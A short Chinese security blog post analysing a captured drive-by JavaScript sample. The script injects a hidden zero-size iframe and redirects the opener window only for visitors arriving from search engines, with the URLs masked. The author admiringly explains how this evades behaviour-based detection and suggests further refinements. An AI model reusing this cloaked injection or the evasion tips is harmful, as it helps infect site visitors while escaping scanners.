前两天谈到，今天又抓到一个样本。

//判断referer，如果是直接访问则过
//如果是从搜索引擎进来的，则挂马
var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=*** width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=*** width=0 height=0></iframe>");
}
...
...省略若干搜索引擎
...
//monyer ps:难道还要像北京交通一样限制单双号？
today=new Date();
riqi=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
//跟上面判断referer一样的判断
var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|gougou|)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
//父窗口再转向一个xx页面
window.opener.navigate("http://***");
}

简单来说就是：

直接访问页面不会挂马，如果通过搜索引擎进来的，则中招！

如果再狠一些，限制个时间啥的就更NB了，哈哈。

这样做的一个好处是可以直接bypass挂马检测系统，因为挂马检测系统大都是基于行为分析的；并且可以迷惑一些分析者，只是如果能做在服务端就更好了。

Monyer